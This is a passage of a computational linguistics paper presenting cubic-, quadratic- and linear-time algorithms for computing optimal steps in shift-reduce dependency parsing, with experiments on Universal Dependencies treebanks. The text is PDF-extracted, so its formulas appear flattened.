rules correspond to attachment of left and right children, respectively, in dependency parsing. Secondly, we require that there is precisely one rule (B,C) → a for each a ∈ Σ. W`(B,i,i) = { 1, if (B,C) → ai 0, otherwise Wr(C,i,i) = { 1, if (B,C) → ai 0, otherwise W`(B,C,i,j) = ⊕ k Wr(B,i,k)⊗ W`(C,k + 1,j) ⊗w(j,i) Wr(B,C,i,j) = ⊕ k Wr(B,i,k)⊗ W`(C,k + 1,j) ⊗w(i,j) W`(C ′, i,j) = ⊕ A→(D,B), (C′, )→A (C, ), k W`(D,i,k) ⊗W`(B,C,k,j) Wr(B ′, i,j) = ⊕ ( ,B′)→( ,B) A, A→(C,D), k Wr(B,C,i,k) ⊗Wr(D,k,j) W = ⊕ S→(B,C) W`(B, 0, 0) ⊗Wr(C, 0,n) Table 2: Weighted parsing, for an arbitrary semi- ring, with 0 ≤ i < j ≤ n. Note that the additional requirements make the grammar explicitly ‘‘split’’ in the sense of Eisner and Satta (1999), Eisner (2000), and Johnson (2007). That is, the two processes of attaching left and right children, respectively, are independent, with rules (B,C) → a creating ‘‘initial states’’ B and C, respectively, for these two processes. Rules of the form A → (B,C) then combine the end results of these two processes, possibly placing constraints on allowable combinations of B and C. To bring out the relation between our subclass of CFGs and bilexical grammars, one could ex- plicitly write (B,C)(a) → a, A(a) → (B,C)(a), (B′, )(b) → A(a) (B, )(b), and ( ,C′)(c) → ( ,C)(c) A(a). Purely symbolic parsing is extended to weighted parsing much as usual, except that instead of attaching weights to rules, we attach a score w(i,j) to each pair (i,j), which is a potential edge. This can be done for any semiring. In the semiring we will first use, a value is either a non-negative integer or −∞. Further, w1 ⊕w2 = max(w1,w2) and w1 ⊗w2 = w1 + w2 if w1 6= −∞ and w2 6= −∞ and w1⊗w2 = −∞ otherwise. Naturally, the identity element of ⊕ is 0 = −∞ and the identity element of ⊗ is 1 = 0. Tabular weighted parsing can be realized following Eisner and Satta (1999). We assume the input is a string a0a1 · · ·an ∈ Σ∗, with a0 being the prospective root of a tree. Table 2 presents the cubic-time algorithm in the form of a system of recursive equations. With the semiring we chose above, W`(B,i,j) represents the highest score of any right-most derivation of the form (B, ) ⇒ A1(B1, ) ⇒ A1A2(B2, ) ⇒∗ 285 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 (S,S) → a S → (S,S) ( ,S) → ( ,S) S (S, ) → S (S, ) Table 3: Grammar for projective dependency parsing, with Σ = {a} and N = N` = Nr = {S}. Figure 1: Dependency structure and corresponding parse tree that encodes a computation of a shift-reduce parser. A1 · · ·Am(Bm, ) ⇒ A1 · · ·Amaj ⇒∗ ai · · ·aj, for some m ≥ 0, and Wr(C,i,j) has symmetric meaning. Intuitively, W`(B,i,j) considers aj and its left dependents and Wr(C,i,j) considers ai and its right dependents. A value W`(B,C,i,j), or Wr(B,C,i,j), represents the highest score combining ai and its right dependents and aj and its left dependents, meeting in the middle at some k, including also an edge from ai to aj, or from aj to ai, respectively. One may interpret the grammar in Table 3 as encoding all possible computations of a shift- reduce parser, and thereby all projective trees. As there is only one way to instantiate the under- scores, we obtain rule (S,S) → (S,S) S, which corresponds to reduce left, and rule (S,S) → S (S,S), which corresponds to reduce right. Figure 1 presents a parse tree for the grammar and the corresponding dependency tree. Note that if we are not given a particular strategy, such as left-before-right, then the parse tree underspec- ifies whether left children or right children are attached first. This is necessarily the case because the grammar is split. Therefore, the computation in this example may consist of three shifts, fol- lowed by one reduce left, one reduce right, and one reduce left, or it may consist of two shifts, one reduce right, one shift, and two reduce lefts. (P,P) → p (S,S) → s P → (P,P) S → (P,S) S → (S,S) (S, ) → P (S, ) (S, ) → S (S, ) ( ,S) → ( ,P) S ( ,S) → ( ,S) S (S, ) → P (P, ) Table 4: Grammar for dependency parsing of pksm+1, representing a stack of length k + 1 and remaining input of length m, with Σ = {p,s}, N = Nr = N` = {P,S}. The last rule would be excluded for the strict left-to-right strategy, or alternatively one can set w(i,j) = −∞ for j < i < k. For a given gold tree Tg, which may or may not be projective, we let w(i,j) = δg(i,j), where we define δg(i,j) = 1 if (i,j) ∈ Tg and δg(i,j) = 0 otherwise. With the grammar from Table 3, the value W found by weighted parsing is now the score of the most accurate projective tree. By backtracing from W as usual, we can construct the (or more correctly, a) tree with that highest accuracy. We have thereby found an effective way to projectivize a treebank in an optimal way. By a different semiring, we can count the number of trees with the highest accuracy, which reflects the degree of ‘‘choice’’ when projectivizing a treebank. 4 O(n3)O(n3)O(n3) Time Algorithm In a computation starting from a configuration (a0 · · ·ak,b1 · · ·bm,T), not every projective parse of the string a0 · · ·akb1 · · ·bm is achievable. The structures that are achievable are captured by the grammar in Table 4, with P for prefix and S for suffix (also for ‘‘start symbol’’). Nonterminals P and (P,P) correspond to a node ai (0 ≤ i < k) that does not have children. Nonterminal S corresponds to a node that has either ak or some bj (1 ≤ j ≤ m) among its descendants. This then means that the node will appear on top of the stack at some point in the computation. Nonterminal (S,S) also corresponds to a node that has one of the rightmost m + 1 nodes among its descendants, and, in addition, if it itself is not one of the rightmost m + 1 nodes, then it must have a left child. 286 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 Figure 2: Dependency structure and corresponding parse tree, for stack of height 4 and remaining input of length 1. Nonterminal (P,S) corresponds to a node ai (0 ≤ i < k) that has ak among its descendants but that does not have a left child. Nonterminal (S,P) corresponds to a node ai (0 ≤ i < k) that has a left child but no right children. For ai to be given a left child, it is required that it eventually appear on top of the stack. This requirement is encoded in the absence of a rule with right-hand side (S,P). In other words, (S,P) cannot be part of a successful derivation, unless the rule (S,S) → (S,P) S is subsequently used, which then corresponds to giving ai a right child that has ak among its descendants. Figure 2 shows an example. Note that we can partition a parse tree into ‘‘columns’’, each con- sisting of a path starting with a label in N, then a series of labels in N` × Nr and ending with a label in Σ. A dependency structure that is not achievable, and that appropriately does not correspond to a parse tree, for a stack of height 4 and remaining input of length 1, is: • • • • | • Suppose we have a configuration (a0 · · ·ak, b1 · · ·bm,T) for sentence length n, which implies k + m ≤ n. We need to decide whether a shift, reduce left, or reduce right should be done in order to achieve the highest accuracy, for given gold tree Tg. For this, we calculate three values σ1, σ2 and σ3, and determine which is highest. The first value σ1 is obtained by investigat- ing the configuration (a0 · · ·akb1,b2 · · ·bm,∅) resulting after a shift. We run our generic tab- ular algorithm for the grammar in Table 4, for input pk+1sm, to obtain σ1 = W . The scores are obtained by translating indices of a0 · · · akb1 · · ·bm = c0 · · ·ck+m to indices in the orig- inal input, that is, we let w(i,j) = δg(ci,cj). However, the shift, which pushes an element on top of ak, implies that ak will obtain right children before it can obtain left children. If we assume the left-before-right strategy, then we should avoid that ak obtains left children. We could do that by refining the grammar, but find it easier to set w(k,i) = −∞ for all i < k. For the second value σ2, we investigate the con- figuration (a0 · · ·ak−1,b1 · · ·bm,∅) resulting after a reduce left. The same grammar and algorithm are used, now for input pk−1sm+1. With a0 · · · ak−1b1 · · ·bm = c0 · · ·ck+m−1, we let w(i,j) = δg(ci,cj). We let σ2 = W ⊗ δg(ak−1,ak). In case of a strict left-before-right strategy, we set w(k − 1, i) = −∞ for i < k − 1, to avoid that ak−1 obtains left children after having obtained a right child ak. If k ≤ 1 then the third value is σ3 = −∞, as no reduce right is applicable. Otherwise we investigate (a0 · · ·ak−2ak,b1 · · ·bm,∅). The same grammar and algorithm are used as before, and w(i,j) = δg(ci,cj) with a0 · · ·ak−2akb1 · · ·bm = c0 · · ·ck+m−1. Now σ3 = W ⊗ δg(ak,ak−1). In case of a right-before-left strategy, we set w(k,i) = −∞ for k < i. We conclude that the time complexity of cal- culating the optimal step is three times the time complexity of the algorithm of Table 2, hence cubic in n. For a proof of correctness, it is sufficient to show that each parse tree by the grammar in Table 4 corresponds to a computation with the same score, and conversely that each computation corresponds to an equivalent parse tree. Our grammar has spurious ambiguity, just as the shift-reduce parser from Table 1, and this can be resolved in the same way, depending on whether the intended strategy is (non-)strict left-before-right or right- before-left, and whether the configuration is the result of a shift, reduce left, or reduce right. Concretely, we can restrict parse trees to attach children lower in the tree if they would be attached earlier in the computation, and thereby we obtain 287 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 Figure 3: A node ν with label in N` ×Nr translates to configuration (d̄1 · · · d̄k′, ē1 · · · ēm′,T), via its shortest path to the root. The overlined symbols denote the integers between 0 and n corresponding to d1 · · · dk′e1 · · ·em′ ∈ p+s∗. a bijection between parse trees and computations. For example, in the middle column of the parse tree in Figure 2, the (P,S) and its right child occur below the (S,S) and its left child, to indicate the reduce left precedes the reduce right. The proof in one direction assumes a parse tree, which is traversed to gather the steps of a computation. This traversal is post-order, from left to right, but skipping the nodes representing stack elements below the top of the stack, starting from the leftmost node labeled s. Each node ν with a label in N` × Nr corresponds to a step. If the child of ν is labeled s, then we have a shift, and if it has a right or left child with a label in N, then it corresponds to a reduce left or reduce right, respectively. The configuration resulting from that step can be constructed as sketched in Figure 3. We follow the shortest path from ν to the root. All the leaves to the right of the path correspond to the remaining input. For the stack, we gather the leaves in the columns of the nodes on the path, as well as those of the left children of nodes on the path. Compare this with the concept of right-sentential forms in the theory of context-free parsing. For a proof in the other direction, we can make use of existing parsing theory, which tells us how to translate a computation of the shift-reduce parser to a dependency structure, which in turn is easily translated to an undecorated parse tree. It then remains to show that the nodes in that tree can be decorated (in fact in a unique way), according to the rules from Table 4. This is straightforward given the meanings of P and S described earlier in this section. Most notably, the absence of a rule Figure 4: Components C1, C2, C3 partitioning nodes in β, and gold edges linking them to α. with right-hand side ( ,P) P does not prevent the decoration of a tree that was constructed out of a computation, because a reduction involving two nodes within the stack is only possible if the rightmost of these nodes eventually appears on top of the stack, which is only possible when the computation has previously made ak a descendant of that node, hence we would have S rather than P . 5 O(n2O(n2O(n2) Time Algorithm Assume a given configuration (α,β,T) as before, resulting from a shift or reduction. Let α = a0 · · ·ak, A = {a0, . . . ,ak}, and let B be the set of nodes in β. We again wish to calculate the maximum value of |T ′ ∩Tg| for any T ′ such that (α,β,∅) `∗ (0,ε,T ′), but now under the assumption that Tg is projective. Let us call this value σmax . We define w in terms of δg as in the previous section, setting w(i,j) = −∞ for an appropriate subset of pairs (i,j) to enforce a strategy that is (non-)strict left-before-right or right-before-left. The edges in Tg ∩ (B × B) partition the re- maining input into maximal connected compo- nents. Within these components, a node b ∈ B is called critical if it satisfies one or both of the following two conditions: • At least one descendant of b (according to Tg) is not in B. • The parent of b (according to Tg) is not in B. Let Bcrit ⊆ B be the set of critical nodes, listed in order as b1, . . . ,bm, and let Bncrit = B \Bcrit . Figure 4 sketches three components as well as edges in Tg ∩ (A×B) and Tg ∩ (B ×A). Com- ponent C1, for example, contains the critical elements b1, b2, and b3. The triangles under b1, . . . , b7 represent subtrees consisting of edges leading to non-critical nodes. For each b ∈ Bcrit , |Tg ∩ ({b}× A)| is zero or more, or in words, 288 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 critical nodes have zero or more children in the stack. Further, if (a,b) ∈ Tg ∩ (A × Bcrit ), then b is the rightmost critical node in a component; examples are b5 and b7 in the figure. Let Tmax be any tree such that (α,β,∅) `∗ (0,ε,Tmax ) and |Tmax ∩Tg| = σmax . Then we can find another tree T ′max that has the same properties and in addition satisfies: 1. Tg ∩ (B ×Bncrit ) ⊆ T ′max , 2. T ′max ∩ (Bncrit ×A) = ∅, 3. T ′max ∩ (B ×Bcrit ) ⊆ Tg, or in words, (1) the subtrees rooted in the critical nodes are entirely included, (2) no child of a non-critical node is in the stack, and (3) within the remaining input, all edges to critical nodes are gold. Very similar observations were made before by Goldberg et al. (2014), and therefore we will not give full proofs here. The structure of the proof is in each case that all violations of a property can be systematically removed, by rearranging the computation, in a way that does not decrease the score. We need two more properties: 4. If (a,b) ∈ T ′max ∩ (A × Bcrit ) \ Tg then either: • b is the rightmost critical node in its component, or • there is (b,a′) ∈ T ′max ∩ Tg, for some a′ ∈ A and there is at least one other critical node b′ to the right of b, but in the same component, such that (b′,a′′) ∈ T ′max ∩ Tg or (a′′,b′) ∈ T ′max ∩ Tg, for some a′′ ∈ A. 5. If (b,a) ∈ T ′max ∩(Bcrit ×A) \ Tg then there is (b,a′) ∈ T ′max , for some a′ ∈ A, such that a′ is a sibling of a immediately to its right. Figure 5, to be discussed in more detail later, illustrates property (4) for the non-gold edge from a4; this edge leads to b4 (which has outgoing gold edge to a5) rather than to b5 or b6. It further respects property (4) because of the gold edges connected to b7 and b8, which occur to the right of b4 but in the same component. Property (5) is illustrated for the non-gold edge from b3 to a8, which has sibling a9 immediately to the right. The proof that property (4) may be assumed to hold, without loss of generality, again involves Figure 5: Counting additional gold edges in A×Bcrit ∪ Bcrit ×A. Gold edges are thick, others are thin. Gold edges that are not created appear dotted. making local changes to the computation, in particular replacing the b in an offending non- gold edge (a,b) ∈ A × Bcrit by another critical node b′ further to the left or at the right end of the component. Similarly, for property (5), if we have an offending non-gold edge (b,a), then we can rearrange the computation, such that node a is reduced not into b but into one of the descendants of b in B that was given children in A. If none of the descendants of b in B was given children in A, then a can instead be reduced into its neighbor in the stack immediately to the left, without affecting the score. By properties (1)–(3), we can from here on ignore non-critical nodes, so that the remaining task is to calculate σmax −|Bncrit|. In fact, we go further than that and calculate σmax − M, where M = |Tg ∩ (B × B)|. In other words, we take for granted that the score can be at least as much as the number of gold edges within the remaining input, which leaves us with the task of counting the additional gold edges in the optimal computation. For any given component C we can consider the sequence of edges that the computation creates between A and C, in the order in which they are created: • for the first gold edge between C and A, we count +1, • for each subsequent gold edge between C to A, we count +1, • we ignore interspersed non-gold edges from C to A, • but following a non-gold edge from A to C, the immediately next gold edge between C and A is not counted, because that non- gold edge implies that another gold edge in Bcrit ×Bcrit cannot be created. This is illustrated by Figure 5. For (b3,a9) we count +1, it being the first gold edge connected 289 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 to the component. For the subsequent three gold edges, we count +1 for each, ignoring the non- gold edge (b3,a8). The non-gold edge (a4,b4) implies that the parent of b4 is already determined. One would then perhaps expect we count −1 for non-creation of (b5,b4), considering (b5,b4) was already counted as part of M. Instead, we let this −1 cancel out against the following (b7,a3), by letting the latter contribute +0 rather than +1. The subsequent edge (b7,a2) again contributes +1, but the non-gold edge (a1,b7) means that the subsequent (a0,b8) contributes +0. Hence the net count in this component is 5. The main motivation for properties (1)–(5) is that they limit the input positions that can be relevant for a node that is on top of the stack, thereby eliminating one factor m from the time complexity. More specifically, the gold edges relate a stack element to a ‘‘current critical node’’ in a ‘‘current component’’. We need to distinguish however between three possible states: • N (none): none of the critical nodes from the current component were shifted on to the stack yet, • C (consumed): the current critical node was ‘consumed’ by it having been shifted and assigned a parent, • F (fresh): the current critical node was not consumed, but at least one of the preceding critical nodes in the same component was consumed. For 0 ≤ i ≤ k, we define p(i) to be the index j such that (bj,ai) ∈ Tg, and if there is no such j, then p(i) = ⊥, where ⊥ denotes ‘undefined’. For 0 ≤ i < k, we let p≥(i) = p(i) if p(i) 6= ⊥, and p≥(i) = p≥(i + 1) otherwise, and further p≥(k) = p(k). Intuitively, we seek a critical node that is the parent of ai, or if there is none, of ai+1, . . . We define c(i) to be the smallest j such that (ai,bj) ∈ Tg, or in words, the index of the leftmost child in the remaining input, and c(i) = ⊥ if there is none. As representative element of a component with critical element bj we take the critical element that is rightmost in that component, or formally, we define R(j) to be the largest j′ such that bj′ is an ancestor (by Tg ∩ (Bcrit × Bcrit )) of bj. For completeness, we define R(⊥) = ⊥. We let P(i) = R(p(i)) and P≥(i) = R(p≥(i)). Note that score(i,j,q) = 0 if i < 0, otherwise: score(i,j,q) = [nchildren(i)−∆(c(i) = P≥(j) ∧q 6= N)]⊗ w(i,j) ⊗score(i− 1, i,τ(i,j,q)) ⊕ w(j,i) ⊗score(i− 1,j,q) ⊕ [if p(j) = ⊥∨ q = C then −∞ else ∆(q = N) ⊗score′(i,p(j))] score′(i,j) = 0 if i < 0, otherwise: score′(i,j) = [if p′(i,j) = ⊥ then score′(i− 1,j) else 1 ⊗score′(i− 1,p′(i,j))] ⊕ nchildren(i) ⊗score(i− 1, i,τ ′(i,j)) nchildren(i) = |{j | w(i,j + k) = 1}| τ(i,j,q) = if q = N ∨P≥(i) 6= P≥(j) then N else if p≥(i) 6= p≥(j) then F else q τ ′(i,j) = if P≥(i) 6= R(j) then N else if p≥(i) 6= j then F else C Table 5: Quadratic-time algorithm. R(c(i)) = c(i) for each i. For 0 ≤ i ≤ k and 1 ≤ j ≤ m, we let p′(i,j) = p(i) if P(i) = R(j) and p′(i,j) = ⊥ otherwise; or in words, p′(i,j) is the index of the parent of ai in the remaining input, provided it is in the same component as bj. Table 5 presents the algorithm, expressed as system of recursive equations. Here score(i,j,q) represents the maximum number of gold edges (in addition to M) in a computation from (a0 · · ·aiaj,b` · · ·bk,∅), where ` depends on the state q ∈ {N ,C,F}. If q = N , then ` is the smallest number such that R(`) = P≥(j); critical nodes from the current component were not yet shifted. If q = C, then ` = p≥(j) + 1 or ` = P≥(j) + 1; this can be related to the two cases distinguished by property (4). If q = F, then ` is greater than the smallest number such that R(`) = P≥(j), but smaller than or equal to p≥(j) or equal to ` = P≥(j) + 1. Similarly, score′(i,j) represents the maximum number of gold edges in a computation from (a0 · · ·aibj,bj+1 · · ·bk,∅). For i ≥ 0, the value of score(i,j,q) is the maximum (by ⊕) of three values. The first corresponds to a reduction of aj into ai, which turns the stack into a0 · · ·ai−1ai; this would also include shifts of any remaining right children of ai, if there are any, and their reduction into ai. Because there is a new top-of-stack, the state is updated using τ. The function nchildren counts the critical nodes that are children of ai. We define nchildren in terms of w rather than Tg, as in the case of the right-before-left strategy 290 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 Figure 6: Graphical representation of the first value in the definition of score, for the case q = F, assuming c(i) = P≥(j) = ` and ai further has children b`+1 and b`+2. Because q = F, there was some other node b`′ in the same component that was shifted on to the stack earlier and given a (non-gold) parent; let us assume `′ = ` − 1. We can add 3 children to the score, but should subtract ∆(c(i) = P≥(j) ∧ q 6= N) = 1, to compensate for the fact that edge (b`,b`−1) cannot be constructed, as b`−1 can only have one parent. If we further assume ai has a parent among the critical nodes, then that parent must be in a different component, and therefore τ(i,j,q) = N . after a reduce right we would preclude right children of ak by setting w(k,i) = −∞ for k < i. The leftmost of the children, at index c(i), is not counted (or in other words, 1 is subtracted from the number of children) if it is in the current component P≥(j) and that component is anything other than ‘none’; here ∆ is the indicator function, which returns 1 if its Boolean argument evaluates to true, and 0 otherwise. Figure 6 illustrates one possible case. The second value corresponds to a reduction of ai into aj, which turns the stack into a0 · · ·ai−1aj, leaving the state unchanged as the top of the stack is unchanged. The third value is applicable if aj has parent b` that has not yet been consumed, and it corresponds to a shift of b` and a reduction of ai into b` (and possibly further shifts and reductions that are implicit), resulting in stack a0 · · ·aib`. If this creates the first gold edge connected to the current component, then we add +1. For i ≥ 0, the value of score′(i,j) is the max- imum of two values. The first value distinguishes two cases. In the first case, ai does not have a parent in the same component as bj, and ai is reduced into bj without counting the (non-gold) edge. In the second case, ai is reduced into its par- ent, which is bj or another critical node that is an ancestor of bj; in this case we count the gold edge. The second value in the definition of score′(i,j) corresponds to a reduction of bj into ai (as well as shifts of any critical nodes that are children of ai, and their reduction into ai), resulting in stack Figure 7: Assuming the thick edges are gold, then the thin edge cannot be gold as well, as the gold tree is projective. A score obtained from a stack a0 · · ·ai−1ai is therefore at least as high as a score obtained from a stack a0 · · ·ai−1aj , unless all of a`′+1, . . . , ai first become children of aj via a series of reduce right steps, all producing non-gold edges, and therefore adding nothing to the score. The κ function implements such a series of reduce right steps. a0 · · ·ai−1ai. The state is updated using τ ′, in the light of the new top-of-stack. The top-level call is score(k − 1,k,N). As this does not account for right children of the top of stack ak, we need to add nchildren(k). Putting everything together, we have σmax = M ⊗ score(k − 1,k,N) ⊗ nchildren(k). The time complexity is quadratic in k + m ≤ n, given the quadratically many combinations of i and j in score(i,j,q) and score′(i,j). 6 O(n)O(n)O(n) Time Algorithm Under the same assumption as in the previous sec- tion, namely, that Tg is projective, we can further reduce the time complexity of computing σmax , by two observations. First, let us define λ(i,j) to be true if and only if there is an ` < i such that (a`,aj) ∈ Tg or (aj,a`) ∈ Tg. If (aj,ai) /∈ Tg and λ(i,j) is false, then the highest score attain- able from a configuration (a0 · · ·ai−1aj,β,∅) is no higher than the highest score attainable from (a0 · · ·ai−1ai,β,∅), or, if aj has a parent bj′, from (a0 · · ·aibj′,β′,∅), for appropriate suffix β′ of β. This means that in order to calculate score(i,j,q) we do not need to calculate score(i− 1,j,q) in this case. Secondly, if (aj,ai) /∈ Tg and λ(i,j) is true, and if there is `′ < i such that (a`′,ai) ∈ Tg or (ai,a`′) ∈ Tg, then there are no edges between aj and ai′ for any i′ with `′ < i′ < i, because of projectivity of Tg. We therefore do not need to calculate score(i′,j,q) for such values of i′ in order to find the computation with the highest score. This is illustrated in Figure 7. 291 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 Let us define κ(i) to be the smallest `′ such that (a`′,ai) ∈ Tg or (ai,a`′) ∈ Tg, or i − 1 if there is no such `′. In the definition of score, we may now replace w(j,i) ⊗score(i− 1,j,q) by: [if w(j,i) = 1 then 1 ⊗score(i− 1,j,q) else if w(j,i) = 0 ∧λ(i,j) then score(κ(i),j,q) else −∞] Similarly, we define λ′(i,j) to be true if and only if there is an ` < i such that (a`,bj′) ∈ Tg or (bj′,a`) ∈ Tg for some j′ with R(j′) = R(j). In the definition of score′, we may now replace score′(i− 1,j) by: [if λ′(i,j) then score′(κ(i),j) else −∞] Thereby the algorithm becomes linear-time, because the number of values score(i,j,q) and score′(i,j) that are calculated for any i is now linear. To see this, consider that for any i, score(i,j,q) would be calculated only if j = i + 1, if (ai,aj) ∈ Tg or (aj,ai) ∈ Tg, if (aj,ai+1) ∈ Tg, or if j is smallest such that there is ` < i with (a`,aj) ∈ Tg or (aj,a`) ∈ Tg. Similarly, score(i,j) would be calculated only if score(i,j′,q) would be calculated and (bj,aj′) ∈ Tg, if (bj,ai+1) ∈ Tg, or if j is smallest such that there is ` ≤ i with (a`,bj′) ∈ Tg or (bj′,a`) ∈ Tg for some j′ such that bj′ an ancestor of bj in the same component. 7 Towards Constant Time Per Calculation A typical application would calculate the optimal step for several or even all configurations within one computation. Between one configuration and the next, the stack differs at most in the two rightmost elements and the remaining input differs at most in that it loses its leftmost element. Therefore, all but a constant number of values of score(i,j,q) and score′(i,j) can be reused, to make the time complexity closer to constant time for each calculation of the optimal step. The practical relevance of this is limited however if one would typically reload the data structures containing the relevant values, which are of linear size. Hence we have not pursued this further. 8 Experiments Our experiments were run on a laptop with an Intel i7-7500U processor (4 cores, 2.70 GHz) with 8 GB Figure 8: Geometric mean of the number of optimal projectivized trees against sentence length. of RAM. The implementation language is Java, with DL4J2 for the classifier, realized as a neural network with a single layer of 256 hidden nodes. Training is with batch size 100, and 20 epochs. Features are the (gold) parts of speech and length- 100 word2vec representations of the word forms of the top-most three stack elements, as well as of the left-most three elements of the remaining input, and the left-most and right-most depen- dency relations in the top-most two stack elements. 8.1 Optimal Projectivization We need to projectivize our training corpus for the experiments in Section 8.2, using the algorithm described at the end of Section 3. As we are not aware of literature reporting experiments with optimal projectivization, we briefly describe our findings here. Projectivizing all the training sets in Universal Dependencies v2.23 took 244 sec in total, or 0.342 ms per tree. As mentioned earlier, there may be multiple projectivized trees that are optimal in terms of accuracy, for a single gold tree. We are not aware of meaningful criteria that tell us how to choose any particular one of them, and for our experiments in Section 8.2 we have chosen an arbitrary one. It is conceivable, however, that the choices of the projectivized trees would affect the accuracy of a parser trained on them. Figure 8 illustrates the degree of ‘‘choice’’ when projectiving trees. We consider 2https://deeplearning4j.org/. 3https://universaldependencies.org/. 292 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 https://deeplearning4j.org/ https://universaldependencies.org/ pseudo optimal grc 91.41 92.50 de 98.89 98.97 ja 99.99 99.99 Table 6: Accuracy (LAS or UAS, which here are identical) of pseudo-projectivization and of optimal projectivization. two languages that are known to differ widely in the prevalence of non-projectivity, namely Ancient Greek (PROIEL) and Japanese (BCCWJ), and we consider one more language, German (GSD), that falls in between (Straka et al., 2015). As can be expected, the degree of choice grows roughly exponentially in sentence length. Table 6 shows that pseudo-projectivization is non-optimal. We realized pseudo-projectivization using MaltParser 1.9.0.4 8.2 Computing the Optimal Step To investigate the run-time behavior of the algo- rithms, we trained our shift-reduce dependency parser on the German training corpus, after it was projectivized as in Section 8.1. In a second pass over the same corpus, the parser followed the steps returned by the trained classifier. For each configuration that was obtained in this way, the running time was recorded of calculating the optimal step, with the non-strict left-before-right strategy. For each configuration, it was verified that the calculated scores, for shift, reduce left, and reduce right, were the same between the three algorithms from Sections 4, 5, and 6. The two-pass design was inspired by Choi and Palmer (2011). We chose this design, rather than online learning, as we found it easiest to imple- ment. Goldberg and Nivre (2012) discuss the relation between multi-pass and online learning approaches. As Figure 9 shows, the running times of the algorithms from Sections 5 and 6 grow slowly as the summed length of stack and remaining input grows; note the logarithmic scale. The improvement of the linear-time algorithm over the quadratic-time algorithm is perhaps less than one may expect. This is because the calculation of the critical nodes and the construction of the nec- essary tables, such as p, p′, and R, is considerable compared to the costs of the memoized recursive calls of score and score′. 4http://www.maltparser.org/. Figure 9: Mean running time per step (milliseconds) against length of input, for projectivized and un- projectivized trees. Figure 10: Mean k + m′ against k + m. Both these algorithms contrast with the algo- rithm from Section 4, applied on projectivized trees as above (hence tagged proj in Figure 9), and with the remaining input simplified to just its critical nodes. For k + m = 80, the cubic-time algorithm is slower than the linear-time algorithm by a factor of about 65. Nonetheless, we find that the cubic-time algorithm is practically relevant, even for long sentences. The decreases at roughly k + m = 88, which are most visible for Section 4 (proj), are explained by the fact that the running time is primarily determined by k + m′, where m′ is the number of critical nodes. Because k + m is bounded by the sentence length and the stack height k tends to be much less than the sentence length, high values of k + m tend to result from the length m of the remaining input being large, which in turn implies that there will be more non-critical nodes that are removed before the most time-consuming part of the analyses is entered. This is confirmed by Figure 10. 293 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 http://www.maltparser.org/ (1) (2) (3) (4) (5) LAS UAS subset all subset all all Sec. 6 Sec. 6 Sec. 4 de, 13% 71.15 71.33 71.69 72.57 72.55 263,804 78.09 78.14 78.96 79.78 79.77 da, 13% 69.11 71.42 69.95 72.18 72.25 80,378 75.13 76.98 76.30 78.00 78.21 eu, 34% 54.69 58.27 54.11 57.49 57.81 72,974 67.49 70.07 67.71 70.07 70.13 el, 12% 71.62 72.78 70.49 72.66 72.34 42,326 77.45 78.34 77.14 78.91 78.36 cu, 20% 56.25 59.09 56.31 58.78 59.52 37,432 68.08 69.95 69.07 70.10 70.94 got, 22% 51.96 55.00 53.44 55.94 56.20 35,024 64.48 66.58 65.85 67.85 68.09 hu, 26% 52.70 56.20 54.09 57.37 57.62 20,166 65.72 68.96 67.55 70.20 70.30 Table 7: Accuracies, with percentage of trees that are non-projective, and number of tokens. Only gold computations are considered in a single pass (1,2) or there is a second pass as well (3,4,5). The first pass is on the subset of projective trees (1,3) or on all trees after optimal projectivization (2,4,5). The second pass is on projectivized trees (3,4) or on unprojectivized trees (5). The main advantage of the cubic-time algorithm is that it is also applicable if the training corpus has not been projectivized. To explore this we have run this algorithm on the same corpus again, but now without projectivization in the second pass (for training the classifier in the first pass, projec- tivization was done as before). In this case, we can no longer remove non-critical nodes (without it affecting correctness), and now the curve is mono- tone increasing, as shown by Section 4 (unproj) in Figure 9. Nevertheless, with mean running times below 0.25 sec even for input longer than 100 tokens, this algorithm is practically relevant. 8.3 Accuracy If a corpus is large enough for the parameters of a classifier to be reliably estimated, or if the vast majority of trees is projective, then accuracy is not likely to be much affected by the work in this paper. We therefore also consider six languages that have some of the smallest corpora in UD v2.2 in combination with a relatively large proportion of non-projective trees: Danish, Basque, Greek, Old Church Slanovic, Gothic, and Hungarian. For these languages, Table 7 shows that accuracy is generally higher if training can benefit from all trees. In a few cases, it appears to be slightly better to train directly on non-projective trees rather than on optimally projectivized trees. 9 Conclusions We have presented the first algorithm to calculate the optimal step for shift-reduce dependency pars- ing that is applicable on non-projective training corpora. Perhaps even more innovative than its functionality is its modular architecture, which im- plies that the same is possible for related kinds of parsing, as long as the set of allowable transitions can be described in terms of a split context-free grammar. The application of the framework to, among others, arc-eager dependency parsing is to be reported elsewhere. We have also shown that calculation of the optimal step is possible in linear time if the train- ing corpus is projective. This is the first time this has been shown for a form of projective, deter- ministic dependency parsing that does not have the property of arc-decomposibility. Acknowledgments The author wishes to thank the reviewers for comments and suggestions, which led to substan- tial improvements. References Lauriane Aufrant, Guillaume Wisniewski, and François Yvon. 2018. Exploiting dynamic ora- cles to train projective dependency parsers on non-projective trees. In Conference of the North American Chapter of the Association for Computational Linguistics: Human Lan- guage Technologies, volume 2, pages 413–419. New Orleans, LA. Jinho D. Choi and Martha Palmer. 2011. Getting the most out of transition-based dependency pars- ing. In 49th Annual Meeting of the Association for Computational Linguistics, Proceedings of the Conference, pages 687–692. Portland, OR. Jason Eisner. 2000. Bilexical grammars and their cubic-time parsing algorithms. In Harry Bunt and Anton Nijholt, editors, Advances in Probabilis- tic and other Parsing Technologies, chapter 3, pages 29–61. Kluwer Academic Publishers. 294 Downloaded from 